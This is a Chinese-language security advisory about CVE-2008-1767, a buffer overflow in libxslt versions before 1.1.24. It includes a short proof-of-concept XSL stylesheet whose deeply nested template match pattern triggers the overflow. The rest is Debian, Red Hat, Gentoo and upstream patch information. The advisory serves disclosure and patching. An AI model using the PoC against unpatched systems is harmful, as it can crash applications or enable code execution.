安全研究

安全漏洞
libxslt XSL文件处理缓冲区溢出漏洞

发布日期:2008-05-21
更新日期:2008-05-29

受影响系统:
XMLSoft libxslt < 1.1.24
不受影响系统:
XMLSoft libxslt 1.1.24
描述:
BUGTRAQ  ID: 29312
CVE(CAN) ID: CVE-2008-1767

Libxslt是为GNOME项目开发的XSLT C库,XSLT本身是用于定义XML转换的XML语言。

libxslt库在转换XML文档期间使用的固定大小的数组,如果XSL样式表文件中设置了特定的template match条件的话,则使用该库的应用程序在解析文件时会触发缓冲区溢出,导致应用程序崩溃或执行任意指令。

<*来源:Anthony de Almeida Lopes
  
  链接:http://secunia.com/advisories/30315/
        http://bugzilla.gnome.org/show_bug.cgi?id=527297
        https://bugzilla.redhat.com/long_list.cgi?buglist=446809
        https://www.redhat.com/support/errata/RHSA-2008-0287.html
        http://www.debian.org/security/2008/dsa-1589
        http://security.gentoo.org/glsa/glsa-200806-02.xml
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="xml"/>

<xsl:template
match="html/body/table/tr/td/div/div/div/div/div/div/div/div/table/tr/td/table/tr/td/p/b">
        <xsl:if test="contains(text(), 'published')">
                <found/>
        </xsl:if>
</xsl:template>
</xsl:stylesheet>

建议:
厂商补丁:

Debian
------
Debian已经为此发布了一个安全公告(DSA-1589-1)以及相应补丁:
DSA-1589-1:New libxslt packages fix execution of arbitrary code
链接:http://www.debian.org/security/2008/dsa-1589

补丁下载:

Source archives:

http://security.debian.org/pool/updates/main/libx/libxslt/libxslt_1.1.19.orig.tar.gz
Size/MD5 checksum:  2799906 622e5843167593c8ea39bf86c66b8fcf
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt_1.1.19-2.dsc
Size/MD5 checksum:      849 27df832e1c58fa0b4ee2fc08ae23eb52
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt_1.1.19-2.diff.gz
Size/MD5 checksum:   149924 3135ddae6ed99518ca98cb6dd32f9cf5

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_alpha.deb
Size/MD5 checksum:   107220 cb23c0170e99f97ba4a6328b6c15d4e8
http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_alpha.deb
Size/MD5 checksum:   131268 264ec9a09e6fd46eb6acb82b6e2e458f
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_alpha.deb
Size/MD5 checksum:   690048 6af24b16a70e3eda53cf9b01aeb72abe
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_alpha.deb
Size/MD5 checksum:   362862 b0bfc373c7b2b029bdecc32fe3c6b393
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_alpha.deb
Size/MD5 checksum:   230516 c613baf2799aca2b10f704c72d65f6dd

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_amd64.deb
Size/MD5 checksum:   131736 bd359cba79ae664919f1d28bb7ee7bb9
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_amd64.deb
Size/MD5 checksum:   630600 9f2ce6f099ad058ddb7756c6bec0ad04
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_amd64.deb
Size/MD5 checksum:   225362 6fad243b75ab8773edac788ae83ff0b2
http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_amd64.deb
Size/MD5 checksum:   106520 86122035aa23a3ac883a90f2ad206cb3
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_amd64.deb
Size/MD5 checksum:   360490 43bf746a2e2d510dc2b42bce0ebfe846

arm architecture (ARM)

http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_arm.deb
Size/MD5 checksum:   126438 8d9a6a49d04b7b718ea4891090590ebe
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_arm.deb
Size/MD5 checksum:   213174 5a22f4ddde902b9e62b320d595c717e4
http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_arm.deb
Size/MD5 checksum:   106410 fa92dc9b78ddafc576c917dc634850f7
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_arm.deb
Size/MD5 checksum:   344476 84490df6ef91ef8d59397efd08141adb
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_arm.deb
Size/MD5 checksum:   612866 b755daf391dc131cec3cf5170f7ff3ef

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_hppa.deb
Size/MD5 checksum:   132206 246544f21eb977706164148ac110fef4
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_hppa.deb
Size/MD5 checksum:   656512 278e6530497e001b7af16b8c97259640
http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_hppa.deb
Size/MD5 checksum:   107496 3c104b63b086ee54e45796cf8f8f5736
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_hppa.deb
Size/MD5 checksum:   238066 ec3a5a9b5ed19d8cea6e207b94960b06
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_hppa.deb
Size/MD5 checksum:   359052 99da4dbb694efd07fec538b0dfba57da

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_i386.deb
Size/MD5 checksum:   215768 065db1534d256efaa0bdbed1d5bc2efa
http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_i386.deb
Size/MD5 checksum:   106010 d736922f8f98e3655e0d17c47c182911
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_i386.deb
Size/MD5 checksum:   610254 7d2f1de6b328363d404e0167b2c3d0b2
http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_i386.deb
Size/MD5 checksum:   127542 036211c64911322aad9f5afa3c67a8ce
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_i386.deb
Size/MD5 checksum:   350172 fbd79c2f46affc6a6daea73b95c5fe4c

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_ia64.deb
Size/MD5 checksum:   110354 a086d9e71e7152286ff25d6c28d1c188
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_ia64.deb
Size/MD5 checksum:   688004 a39cdbeb7e2bec2db123baf9fb936141
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_ia64.deb
Size/MD5 checksum:   286602 c417da9ebd63d8338401253df1194e01
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_ia64.deb
Size/MD5 checksum:   361472 3643ac55a03571fa185c4e0700298e82
http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_ia64.deb
Size/MD5 checksum:   135176 9cdb256571bf9606ed56840a1e88ddb4

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_mips.deb
Size/MD5 checksum:   106622 5f3f9bff564736decdac2c69983211a0
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_mips.deb
Size/MD5 checksum:   213366 128a0294b6a09059fedb618371ec9d09
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_mips.deb
Size/MD5 checksum:   650424 55eab53a1978e3e2a7c1f7dbd68fc04c
http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_mips.deb
Size/MD5 checksum:   128934 3d52f0f986dd862e8119eabeca944e35
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_mips.deb
Size/MD5 checksum:   371998 8f2ea540fd91ca75559d8589c8855de7

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_mipsel.deb
Size/MD5 checksum:   213564 c405f7eef65b01491758e64551b7977f
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_mipsel.deb
Size/MD5 checksum:   624640 9d2b59c3820eb9c99671399f967e0f3e
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_mipsel.deb
Size/MD5 checksum:   363788 09bdf35805a2de68a4d1dfe15c28dcfc
http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_mipsel.deb
Size/MD5 checksum:   106668 2633adeeddc2edc4e36e45a7e4e92c2f
http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_mipsel.deb
Size/MD5 checksum:   128564 c768001b8441118205f9f513af83e485

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_powerpc.deb
Size/MD5 checksum:   611678 3d3acc7b7be03bd0bb2e31dcadf05720
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_powerpc.deb
Size/MD5 checksum:   365012 94f6735cc42e233a67fd46df084120ee
http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_powerpc.deb
Size/MD5 checksum:   108104 bca54d59be466884a5cfde0532a324df
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_powerpc.deb
Size/MD5 checksum:   222790 12aef46d1088d93375ab824b73702bc2
http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_powerpc.deb
Size/MD5 checksum:   130124 37bb5353c81ed15374acc7305cc54839

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_s390.deb
Size/MD5 checksum:   106798 0a96df71e63deb7d7124aab48152a5df
http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_s390.deb
Size/MD5 checksum:   131712 89e70e2d2fadd7b7ec9268d907a62d29
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_s390.deb
Size/MD5 checksum:   226596 751b28fafff17f6fcb8b2f4c0df370c0
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_s390.deb
Size/MD5 checksum:   601572 85051174031d0ff2c22fb87d1ab759c0
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_s390.deb
Size/MD5 checksum:   357722 661c9551483bf52573e52646aaa13b60

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/libx/libxslt/xsltproc_1.1.19-2_sparc.deb
Size/MD5 checksum:   106330 e6c23ad0752b3c7c22857c935befb984
http://security.debian.org/pool/updates/main/libx/libxslt/python-libxslt1_1.1.19-2_sparc.deb
Size/MD5 checksum:   129134 e6c3f1402576da329d515d9411f7fd53
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1.1_1.1.19-2_sparc.deb
Size/MD5 checksum:   217862 2ce2c27d8de0dc78ee4162b9664f7144
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dev_1.1.19-2_sparc.deb
Size/MD5 checksum:   598868 0acf342e57619d34685f76b879da8891
http://security.debian.org/pool/updates/main/libx/libxslt/libxslt1-dbg_1.1.19-2_sparc.deb
Size/MD5 checksum:   335962 947c59cd2f23b55b897ded3b31ccc1a6

补丁安装方法:

1. 手工安装补丁包:

  首先,使用下面的命令来下载补丁软件:
  # wget url  (url是补丁下载链接地址)

  然后,使用下面的命令来安装补丁:  
  # dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包:

   首先,使用下面的命令更新内部数据库:
   # apt-get update
  
   然后,使用下面的命令安装更新软件包:
   # apt-get upgrade

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2008:0287-01)以及相应补丁:
RHSA-2008:0287-01:Important: libxslt security update
链接:https://www.redhat.com/support/errata/RHSA-2008-0287.html

Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200806-02)以及相应补丁:
GLSA-200806-02:libxslt: Execution of arbitrary code
链接:http://security.gentoo.org/glsa/glsa-200806-02.xml

所有libxslt用户都应升级到最新版本:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=3Ddev-libs/libxslt-1.1.24"

XMLSoft
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://bugzilla.gnome.org/attachment.cgi?id=109216&action=view
http://svn.gnome.org/viewvc/libxslt/trunk/libxslt/pattern.c?r1=1469&r2=1468&pathrev=1469

浏览次数:3782
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客